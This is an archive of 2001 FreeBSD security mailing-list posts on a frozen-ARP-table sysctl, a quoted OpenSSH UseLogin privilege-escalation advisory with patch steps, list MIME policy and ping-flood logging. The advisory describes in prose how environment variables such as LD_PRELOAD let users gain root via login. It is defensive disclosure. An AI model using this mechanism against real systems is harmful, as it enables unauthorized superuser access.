Received: from whale.sunbay.crimea.ua (whale.sunbay.crimea.ua [212.110.138.65])
	by hub.freebsd.org (Postfix) with ESMTP
	id 9D97437B419; Wed,  5 Dec 2001 10:47:03 -0800 (PST)
Received: (from ru@localhost)
	by whale.sunbay.crimea.ua (8.11.6/8.11.2) id fB5IjQ596217;
	Wed, 5 Dec 2001 20:45:26 +0200 (EET)
	(envelope-from ru)
Date: Wed, 5 Dec 2001 20:45:26 +0200
From: Ruslan Ermilov <ru@FreeBSD.ORG>
To: "Louis A. Mamakos" <louie@TransSys.COM>
Cc: Eugene Grosbein <eugen@grosbein.pp.ru>,
	"Crist J . Clark" <cjc@FreeBSD.ORG>, net@FreeBSD.ORG,
	security@FreeBSD.ORG
Subject: Re: NOARP - gateway must answer and have frozen ARP table
Message-ID: <20011205204526.B89520@sunbay.com>
References: <20011205124430.A83642@svzserv.kemerovo.su> <20011205040316.H40864@blossom.cjclark.org> <20011205231735.A1361@grosbein.pp.ru> <20011205193859.B79705@sunbay.com> <200112051835.fB5IZqH95521@whizzo.transsys.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <200112051835.fB5IZqH95521@whizzo.transsys.com>
User-Agent: Mutt/1.3.23i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Wed, Dec 05, 2001 at 01:35:52PM -0500, Louis A. Mamakos wrote:
> Doesn't this behavior need to be on a per-interface basis?  I'm wondering
> if a single sysctl is sufficient to get the desired effect.
> 
No, we want ARP table to stay intact no matter which interface
sends us an update.


Cheers,
-- 
Ruslan Ermilov		Oracle Developer/DBA,
ru@sunbay.com		Sunbay Software AG,
ru@FreeBSD.org		FreeBSD committer,
+380.652.512.251	Simferopol, Ukraine

http://www.FreeBSD.org	The Power To Serve
http://www.oracle.com	Enabling The Information Age

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 10:52:54 2001
Delivered-To: freebsd-security@freebsd.org
Received: from whizzo.transsys.com (whizzo.TransSys.COM [144.202.42.10])
	by hub.freebsd.org (Postfix) with ESMTP
	id C4E9937B417; Wed,  5 Dec 2001 10:52:48 -0800 (PST)
Received: from whizzo.transsys.com (#6@localhost.transsys.com [127.0.0.1])
	by whizzo.transsys.com (8.11.6/8.11.6) with ESMTP id fB5IqmH95809;
	Wed, 5 Dec 2001 13:52:48 -0500 (EST)
	(envelope-from louie@whizzo.transsys.com)
Message-Id: <200112051852.fB5IqmH95809@whizzo.transsys.com>
X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4
To: Ruslan Ermilov <ru@FreeBSD.ORG>
Cc: Eugene Grosbein <eugen@grosbein.pp.ru>,
	"Crist J . Clark" <cjc@FreeBSD.ORG>, net@FreeBSD.ORG,
	security@FreeBSD.ORG
X-Image-URL: http://www.transsys.com/louie/images/louie-mail.jpg
From: "Louis A. Mamakos" <louie@TransSys.COM>
Subject: Re: NOARP - gateway must answer and have frozen ARP table 
References: <20011205124430.A83642@svzserv.kemerovo.su> <20011205040316.H40864@blossom.cjclark.org> <20011205231735.A1361@grosbein.pp.ru> <20011205193859.B79705@sunbay.com> <200112051835.fB5IZqH95521@whizzo.transsys.com> <20011205204526.B89520@sunbay.com> 
In-reply-to: Your message of "Wed, 05 Dec 2001 20:45:26 +0200."
             <20011205204526.B89520@sunbay.com> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Wed, 05 Dec 2001 13:52:48 -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

> On Wed, Dec 05, 2001 at 01:35:52PM -0500, Louis A. Mamakos wrote:
> > Doesn't this behavior need to be on a per-interface basis?  I'm wondering
> > if a single sysctl is sufficient to get the desired effect.
> > 
> No, we want ARP table to stay intact no matter which interface
> sends us an update.

I thought the original desire was to have a network interface which
would respond to ARP requests, but only use static IP->MAC address
mappings installed in the ARP table.  I would imagine there are
circumstances where you'd like other network interfaces on a multi-homed
host to continue to operate in the "normal" fashion.

While the sysctl proposed would appear to enforce that on all interfaces
or none, I don't think that's nearly as useful as per-interface behavior
of how IP->MAC mappings get maintained.  For example, a router between
some upstream transport via an ethernet and some subscriber network
where this restricted ARP function is enabled.

Multiple instances of the sysctl variable, per interface would be
another way to go, but not easily implemented.

louie

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 11:41:14 2001
Delivered-To: freebsd-security@freebsd.org
Received: from leviathan.inethouston.net (leviathan.inethouston.net [66.64.12.249])
	by hub.freebsd.org (Postfix) with ESMTP
	id D144937B419; Wed,  5 Dec 2001 11:40:55 -0800 (PST)
Received: by leviathan.inethouston.net (Postfix, from userid 1001)
	id DAE88407621; Wed,  5 Dec 2001 13:40:53 -0600 (CST)
Date: Wed, 5 Dec 2001 13:40:53 -0600
From: "David W. Chapman Jr." <dwcjr@inethouston.net>
To: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
Cc: security@freebsd.org
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:63.openssh
Message-ID: <20011205194053.GB78905@leviathan.inethouston.net>
Reply-To: "David W. Chapman Jr." <dwcjr@inethouston.net>
Mail-Followup-To: FreeBSD Security Advisories <security-advisories@FreeBSD.org>,
	security@freebsd.org
References: <200112041726.fB4HQbA05231@freefall.freebsd.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <200112041726.fB4HQbA05231@freefall.freebsd.org>
User-Agent: Mutt/1.3.24i
X-Operating-System: FreeBSD 4.4-STABLE i386
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Does this also apply to the openssh-portable port?


On Tue, Dec 04, 2001 at 09:26:37AM -0800, FreeBSD Security Advisories wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> =============================================================================
> FreeBSD-SA-01:63                                           Security Advisory
>                                                                 FreeBSD, Inc.
> 
> Topic:          OpenSSH UseLogin directive permits privilege escalation
> 
> Category:       core/ports
> Module:         openssh
> Announced:      2001-12-02
> Credits:        Markus Friedl <markus@OpenBSD.org>
> Affects:        FreeBSD 4.3-RELEASE, 4.4-RELEASE
>                 FreeBSD 4.4-STABLE prior to the correction date
>                 Ports collection prior to the correction date
> Corrected:      2001-12-03 00:53:28 UTC (RELENG_4)
>                 2001-12-03 00:54:18 UTC (RELENG_4_4)
>                 2001-12-03 00:54:54 UTC (RELENG_4_3)
>                 2001-12-02 06:52:40 UTC (openssh port)
> FreeBSD only:   NO
> 
> I.   Background
> 
> OpenSSH is an implementation of the SSH1 and SSH2 secure shell
> protocols for providing encrypted and authenticated network access,
> which is available free for unrestricted use. Versions of OpenSSH are
> included in the FreeBSD ports collection and the FreeBSD base system.
> 
> II.  Problem Description
> 
> OpenSSH includes a feature by which a user can arrange for
> environmental variables to be set depending upon the key used for
> authentication.  These environmental variables are specified in the
> `authorized_keys' (SSHv1) or `authorized_keys2' (SSHv2) files in the
> user's home directory on the server.  This is normally safe, as this
> environment is passed only to the user's shell, which is invoked with
> user privileges.
> 
> However, when the OpenSSH server `sshd' is configured to use
> the system's login program (via the directive `UseLogin yes' in
> sshd_config), this environment is passed to login, which is invoked
> with superuser privileges.  Because certain environmental variables
> such as LD_LIBRARY_PATH and LD_PRELOAD can be set using the previously
> described feature, the user may arrange for login to execute arbitrary
> code with superuser privileges.
> 
> All versions of FreeBSD 4.x prior to the correction date including
> FreeBSD 4.3 and 4.4 are potentially vulnerable to this problem.
> However, the OpenSSH server is configured to not use the system login
> program (`UseLogin no') by default, and is therefore not vulnerable
> unless the system administrator has changed this setting.
> 
> In addition, there are two versions of OpenSSH included in the
> ports collection.  One is ports/security/openssh, which is the
> BSD-specific version of OpenSSH.  Versions of this port prior to
> openssh-3.0.2 exhibit the problem described above.  The other is
> ports/security/openssh-portable, which is not vulnerable, even if the
> server is set to `UseLogin yes'.
> 
> III. Impact
> 
> Hostile but otherwise legitimate users that can successfully
> authenticate using public key authentication may cause /usr/bin/login
> to run arbitrary code as the superuser.
> 
> If you have not enabled the 'UseLogin' directive in the sshd
> configuration file, you are not vulnerable to this problem.
> 
> IV.  Workaround
> 
> Doing one of the following will eliminate the vulnerability:
> 
> 1) Configure sshd to not use the system login program.  Edit the
>    server configuration file and change any `UseLogin' directives
>    to `UseLogin no'.  This is the preferred workaround.
> 
> 2) If for whatever reason, disabling `UseLogin' is not possible,
>    then one can instead disable public key authentication.  Edit the
>    server configuration file and change any `RSAAuthentication',
>    `DSAAuthentication', or `PubKeyAuthentication' directives
>    to `RSAAuthentication no', `DSAAuthentication no', and
>    `PubKeyAuthentication no', respectively.
> 
> For sshd included in the base system (/usr/bin/sshd), the
> server configuration file is `/etc/ssh/sshd_config'.  For sshd
> from the ports collection, the server configuration file is
> `/usr/local/etc/sshd_config'.
> 
> After modifying the sshd configuration file, the sshd daemon must be
> restarted by executing the following command as root:
> 
> # kill -HUP `cat /var/run/sshd.pid`
> 
> V.   Solution
> 
> 1) Upgrade the vulnerable system to 4.3-RELEASEp21, 4.4-RELEASEp1, or
> 4.4-STABLE after the correction date, or patch your current system
> source code and rebuild.
> 
> 2) FreeBSD 4.x systems prior to the correction date:
> 
> The following patch has been verified to apply to FreeBSD
> 4.3-RELEASE, 4.4-RELEASE, and 4.4-STABLE dated prior to the
> correction date.  It may or may not apply to older, unsupported
> versions of FreeBSD.
> 
> Download the patch and the detached PGP signature from the following
> locations, and verify the signature using your PGP utility.
> 
> # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:63/sshd.patch
> # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:63/sshd.patch.asc
> 
> Execute the following commands as root:
> 
> # cd /usr/src/crypto/openssh
> # patch < /path/to/sshd.patch
> # cd /usr/src/secure/usr.sbin/sshd
> # make depend && make all install
> 
> 3) FreeBSD 4.4-RELEASE systems:
> 
> An experimental upgrade package is available for users who wish to
> provide testing and feedback on the binary upgrade process.  This
> package may be installed on FreeBSD 4.4-RELEASE systems only, and is
> intended for use on systems for which source patching is not practical
> or convenient.
> 
> If you use the upgrade package, feedback (positive or negative) to
> security-officer@FreeBSD.org is requested so we can improve the
> process for future advisories.
> 
> During the installation procedure, backup copies are made of the files
> which are replaced by the package.  These backup copies will be
> reinstalled if the package is removed, reverting the system to a
> pre-patched state.  In addition, the package automatically restarts
> the sshd daemon if it is running.
> 
> Three versions of the upgrade package are available, depending on
> whether or not the system has the kerberosIV or kerberos5
> distributions installed.
> 
> 3a) For systems without kerberosIV or kerberos5 installed:
> 
> # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-01.63.tgz
> # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-01.63.tgz.asc
> 
> Verify the detached PGP signature using your PGP utility.
> 
> # pkg_add security-patch-sshd-01.63.tgz
> 
> 3b) For systems with kerberosIV only installed:
> 
> # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-kerberosIV-01.63.tgz
> # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-kerberosIV-01.63.tgz.asc
> 
> Verify the detached PGP signature using your PGP utility.
> 
> # pkg_add security-patch-sshd-kerberosIV-01.63.tgz
> 
> 3c) For systems with kerberos5 only installed:
> 
> # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-kerberos5-01.63.tgz
> # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-kerberos5-01.63.tgz.asc
> 
> Verify the detached PGP signature using your PGP utility.
> 
> # pkg_add security-patch-sshd-kerberos5-01.63.tgz
> 
> 3d) For systems with both kerberosIV and kerberos5 installed:
> 
> # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-kerberosIV-kerberos5-01.63.tgz
> # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:63/security-patch-sshd-kerberosIV-kerberos5-01.63.tgz.asc
> 
> Verify the detached PGP signature using your PGP utility.
> 
> # pkg_add security-patch-sshd-kerberosIV-kerberos5-01.63.tgz
> 
> [Ports collection]
> 
> One of the following:
> 
> 1) Upgrade your entire ports collection and rebuild the OpenSSH port.
> 
> 2) Deinstall the old package and install a new package dated after the
> correction date, obtained from:
> 
> [i386]
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/security/openssh-3.0.2.tgz
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/security/openssh-3.0.2.tgz
> 
> [alpha]
> Packages are not automatically generated for the alpha architecture at
> this time due to lack of build resources.
> 
> NOTE: It may be several days before updated packages are available. Be
> sure to check the file creation date on the package, because the
> version number of the software has not changed.
> 
> 3) Download a new port skeleton for the openssh port from:
> 
> http://www.freebsd.org/ports/
> 
> and use it to rebuild the port.
> 
> 4) Use the portcheckout utility to automate option (3) above. The
> portcheckout port is available in /usr/ports/devel/portcheckout or the
> package can be obtained from:
> 
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
> 
> VI. Correction details
> 
> Path                                                             Revision
>   Branch
> - -------------------------------------------------------------------------
> src/crypto/openssh/session.c
>   HEAD                                                               1.18
>   RELENG_4                                                       1.4.2.11
>   RELENG_4_4                                                  1.4.2.8.4.1
>   RELENG_4_3                                                  1.4.2.8.2.1
> src/crypto/openssh/version.h
>   HEAD                                                                1.9
>   RELENG_4                                                    1.1.1.1.2.7
>   RELENG_4_4                                              1.1.1.1.2.5.2.1
>   RELENG_4_3                                              1.1.1.1.2.4.2.1
> ports/security/openssh/Makefile                                      1.79
> - -------------------------------------------------------------------------
> 
> For OpenSSH included in the base system, there is a version string
> indicating which FreeBSD localizations are available.  The following
> table lists the version strings for each branch which include this
> security fix:
> 
> Branch                                                     Version string
> - -------------------------------------------------------------------------
> HEAD                         OpenSSH_2.9 FreeBSD localisations 20011202
> RELENG_4                     OpenSSH_2.9 FreeBSD localisations 20011202
> RELENG_4_4                   OpenSSH_2.3.0 FreeBSD localisations 20011202
> RELENG_4_3                   OpenSSH_2.3.0 green@FreeBSD.org 20011202
> - -------------------------------------------------------------------------
> 
> To view the version string of the OpenSSH server, execute the following
> command:
> 
>   % /usr/sbin/sshd -\?
> 
> The version string is also displayed when a client connects to the
> server.
> 
> VII. References
> 
> <URL:http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/session.c#rev1.110>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.0.6 (FreeBSD)
> Comment: For info see http://www.gnupg.org
> 
> iQCVAwUBPAz4rlUuHi5z0oilAQGNBwQAl68aZL6hfJaeAFlNlKwrARJ2XgwjkII2
> q6Nir5KFgeYkPilDdElua81MU5FxUgSyYYBLADRrtyht6otqmK8u5GZJMrKPXadi
> ys3nnqH/LYYREe2RVYmzXOSgjn2q0rqm9zNgYoddQjbTnpRxRq//SuOMVTRoYlJC
> 5QznzsMiK1U=
> =XSLb
> -----END PGP SIGNATURE-----
> 
> This is the moderated mailing list freebsd-announce.
> The list contains announcements of new FreeBSD capabilities,
> important events and project milestones.
> See also the FreeBSD Web pages at http://www.freebsd.org
> 
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-announce" in the body of the message

-- 
David W. Chapman Jr.
dwcjr@inethouston.net	Raintree Network Services, Inc. <www.inethouston.net>
dwcjr@freebsd.org	FreeBSD Committer <www.FreeBSD.org>

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 11:44:55 2001
Delivered-To: freebsd-security@freebsd.org
Received: from netau1.alcanet.com.au (ntp.alcanet.com.au [203.62.196.27])
	by hub.freebsd.org (Postfix) with ESMTP id 080C837B417
	for <freebsd-security@FreeBSD.ORG>; Wed,  5 Dec 2001 11:44:51 -0800 (PST)
Received: from mfg1.cim.alcatel.com.au (mfg1.cim.alcatel.com.au [139.188.23.1])
	by netau1.alcanet.com.au (8.9.3 (PHNE_22672)/8.9.3) with ESMTP id GAA01306;
	Thu, 6 Dec 2001 06:44:47 +1100 (EDT)
Received: from gsmx07.alcatel.com.au by cim.alcatel.com.au
 (PMDF V5.2-32 #37641) with ESMTP id <01KBJEGYX3TCVFKWPQ@cim.alcatel.com.au>;
 Thu, 6 Dec 2001 06:44:27 +1100
Received: (from jeremyp@localhost)	by gsmx07.alcatel.com.au (8.11.6/8.11.6)
 id fB5Jiif90572; Thu, 06 Dec 2001 06:44:44 +1100
Content-return: prohibited
Date: Thu, 06 Dec 2001 06:44:44 +1100
From: Peter Jeremy <peter.jeremy@alcatel.com.au>
Subject: Re: Mail list is posting gone virus!!!!
In-reply-to: <20011205165339.462183B1A2@gemini.nersc.gov>; from dart@nersc.gov
 on Wed, Dec 05, 2001 at 08:53:39AM -0800
To: Eli Dart <dart@nersc.gov>
Cc: Brett Glass <brett@lariat.org>, freebsd-security@FreeBSD.ORG
Mail-Followup-To: Eli Dart <dart@nersc.gov>,
	Brett Glass <brett@lariat.org>, freebsd-security@FreeBSD.ORG
Message-id: <20011206064443.B90238@gsmx07.alcatel.com.au>
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-disposition: inline
User-Agent: Mutt/1.2.5i
References: <brett@lariat.org> <20011205165339.462183B1A2@gemini.nersc.gov>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On 2001-Dec-05 08:53:39 -0800, Eli Dart <dart@nersc.gov> wrote:
>Brett makes a very good point.  This is a _security_ mailing list, 
>for discussion of security issues.  IMHO, there is no need for 
>anything but plaintext traffic on this list.  If people are going to
>send patches, they can include them as part of the text of the 
>message.  This means that PGP signatures get lost, but exceptions can 
>be made if that's deemed important.

Personally, I think that - as a security list - the ability to
include PGP signatures is critical.  Official security announcements
are signed - this is a good thing.  It may also be relevant to
occasionally submit small amounts of code when discussing security
issues.  Overall, I'd like to allow the use of MIME, but restrict
it to text/plain, application/pgp-signature (and similar) and
maybe text/quoted-printable (with a restriction to ensure that the
latter is really text).  (Yes, you can write an ASCII virus, but
it takes more skill than most virus writers have).

Peter

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 11:47:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from switchblade.cyberpunkz.org (switchblade.cyberpunkz.org [198.174.169.125])
	by hub.freebsd.org (Postfix) with ESMTP
	id B65D837B41B; Wed,  5 Dec 2001 11:47:14 -0800 (PST)
Received: from switchblade.cyberpunkz.org (rob@localhost.cyberpunkz.org [127.0.0.1])
	by switchblade.cyberpunkz.org (8.12.1/CpA-TLS-1.2.12-1) with ESMTP id fB5Jl9gI071743
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO);
	Wed, 5 Dec 2001 13:47:10 -0600 (CST)?g
	(envelope-from rob@switchblade.cyberpunkz.org)�
Posted-Date: Wed, 5 Dec 2001 13:47:10 -0600 (CST)
Abuse-Contact: abuse@cyberpunkz.org
Received: (from rob@localhost)
	by switchblade.cyberpunkz.org (8.12.1/8.12.1/Submit) id fB5Jl9Ct071742;
	Wed, 5 Dec 2001 13:47:09 -0600 (CST)?g
	(envelope-from rob)
Date: Wed, 5 Dec 2001 13:47:09 -0600
From: Rob Andrews <rob@switchblade.cyberpunkz.org>
To: "David W. Chapman Jr." <dwcjr@inethouston.net>
Cc: FreeBSD Security Advisories <security-advisories@FreeBSD.ORG>,
	security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:63.openssh
Message-ID: <20011205134709.A71719@switchblade.cyberpunkz.org>
References: <200112041726.fB4HQbA05231@freefall.freebsd.org> <20011205194053.GB78905@leviathan.inethouston.net>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
	protocol="application/pgp-signature"; boundary="CE+1k2dSO48ffgeK"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20011205194053.GB78905@leviathan.inethouston.net>; from dwcjr@inethouston.net on Wed, Dec 05, 2001 at 01:40:53PM -0600
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


--CE+1k2dSO48ffgeK
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

On Wed, Dec 05, 2001 at 01:40:53PM -0600, David W. Chapman Jr. wrote:
> Does this also apply to the openssh-portable port?

> > In addition, there are two versions of OpenSSH included in the
> > ports collection.  One is ports/security/openssh, which is the
> > BSD-specific version of OpenSSH.  Versions of this port prior to
> > openssh-3.0.2 exhibit the problem described above.  The other is
> > ports/security/openssh-portable, which is not vulnerable, even if the
> > server is set to `UseLogin yes'.

The answer to your question was right here in the advisory..

Rob Andrews
Admin | Owner
http://cyberpunkz.org/
rob@cyberpunkz.org

--CE+1k2dSO48ffgeK
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE8Dnm9AXwJ9YLqJJURAgYHAJ4rUXR5Km0GBVACZW5VjULhy0k9qQCbBeMi
TKVEjuRgU09xzIEOFnvePH4=
=+2AZ
-----END PGP SIGNATURE-----

--CE+1k2dSO48ffgeK--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 12:20: 0 2001
Delivered-To: freebsd-security@freebsd.org
Received: from scaup.prod.itd.earthlink.net (scaup.mail.pas.earthlink.net [207.217.120.49])
	by hub.freebsd.org (Postfix) with ESMTP
	id 435E037B41A; Wed,  5 Dec 2001 12:19:55 -0800 (PST)
Received: from dialup-209.244.107.135.dial1.sanjose1.level3.net ([209.244.107.135] helo=blossom.cjclark.org)
	by scaup.prod.itd.earthlink.net with esmtp (Exim 3.33 #1)
	id 16BiW5-0004yo-00; Wed, 05 Dec 2001 12:19:42 -0800
Received: (from cjc@localhost)
	by blossom.cjclark.org (8.11.6/8.11.3) id fB5KJTW04006;
	Wed, 5 Dec 2001 12:19:29 -0800 (PST)
	(envelope-from cjc)
Date: Wed, 5 Dec 2001 12:19:29 -0800
From: "Crist J . Clark" <cristjc@earthlink.net>
To: "Louis A. Mamakos" <louie@TransSys.COM>
Cc: Ruslan Ermilov <ru@FreeBSD.ORG>,
	Eugene Grosbein <eugen@grosbein.pp.ru>, net@FreeBSD.ORG,
	security@FreeBSD.ORG
Subject: Re: NOARP - gateway must answer and have frozen ARP table
Message-ID: <20011205121928.A3061@blossom.cjclark.org>
Reply-To: cjclark@alum.mit.edu
References: <20011205124430.A83642@svzserv.kemerovo.su> <20011205040316.H40864@blossom.cjclark.org> <20011205231735.A1361@grosbein.pp.ru> <20011205193859.B79705@sunbay.com> <200112051835.fB5IZqH95521@whizzo.transsys.com> <20011205204526.B89520@sunbay.com> <200112051852.fB5IqmH95809@whizzo.transsys.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200112051852.fB5IqmH95809@whizzo.transsys.com>; from louie@TransSys.COM on Wed, Dec 05, 2001 at 01:52:48PM -0500
X-URL: http://people.freebsd.org/~cjc/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Wed, Dec 05, 2001 at 01:52:48PM -0500, Louis A. Mamakos wrote:
> > On Wed, Dec 05, 2001 at 01:35:52PM -0500, Louis A. Mamakos wrote:
> > > Doesn't this behavior need to be on a per-interface basis?  I'm wondering
> > > if a single sysctl is sufficient to get the desired effect.
> > > 
> > No, we want ARP table to stay intact no matter which interface
> > sends us an update.
> 
> I thought the original desire was to have a network interface which
> would respond to ARP requests, but only use static IP->MAC address
> mappings installed in the ARP table.  I would imagine there are
> circumstances where you'd like other network interfaces on a multi-homed
> host to continue to operate in the "normal" fashion.

I'm not sure I understand the reason for the static table on one
end. If it is for security, you need to have static tables on _both_
machines or a man-in-the-middle attack is still possible. (And in any
case, MAC addresses are trivial to spoof.)
-- 
Crist J. Clark                     |     cjclark@alum.mit.edu
                                   |     cjclark@jhu.edu
http://people.freebsd.org/~cjc/    |     cjc@freebsd.org

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 13:54:59 2001
Delivered-To: freebsd-security@freebsd.org
Received: from harrier.prod.itd.earthlink.net (harrier.mail.pas.earthlink.net [207.217.120.12])
	by hub.freebsd.org (Postfix) with ESMTP id 1BC1037B405
	for <security@freebsd.org>; Wed,  5 Dec 2001 13:54:57 -0800 (PST)
Received: from dialup-209.244.107.135.dial1.sanjose1.level3.net ([209.244.107.135] helo=blossom.cjclark.org)
	by harrier.prod.itd.earthlink.net with esmtp (Exim 3.33 #1)
	id 16Bk0F-0003jp-00; Wed, 05 Dec 2001 13:54:56 -0800
Received: (from cjc@localhost)
	by blossom.cjclark.org (8.11.6/8.11.3) id fB5LsnL04403;
	Wed, 5 Dec 2001 13:54:49 -0800 (PST)
	(envelope-from cjc)
Date: Wed, 5 Dec 2001 13:54:49 -0800
From: "Crist J . Clark" <cjc@FreeBSD.ORG>
To: Ronan Lucio <ronan@melim.com.br>
Cc: security@FreeBSD.ORG
Subject: Re: Securty logs
Message-ID: <20011205135449.E3061@blossom.cjclark.org>
References: <02f601c17dab$85743670$2aa8a8c0@melim.com.br>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <02f601c17dab$85743670$2aa8a8c0@melim.com.br>; from ronan@melim.com.br on Wed, Dec 05, 2001 at 02:40:17PM -0200
X-URL: http://people.freebsd.org/~cjc/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Wed, Dec 05, 2001 at 02:40:17PM -0200, Ronan Lucio wrote:
> Hi All,
> 
> I have a doubt about the entries in the security log file.
> 
> If I have icmp 8,0 denied for external computers, when
> someone pings, it create an entry in security log file:
> 
> Dec  5 14:01:12 server /kernel: ipfw: 3000 Deny ICMP:8.0 62.211.157.214
> 255.255.255.255 in via fxp0
> 
> But if such computer give a flood attack, I think it will
> create the same entry.
> 
> How can I identify if an entry in security log file was creted
> by simple ping or by a flood attack?

By how many of those log entries you get. Each packet will generate a
message.
-- 
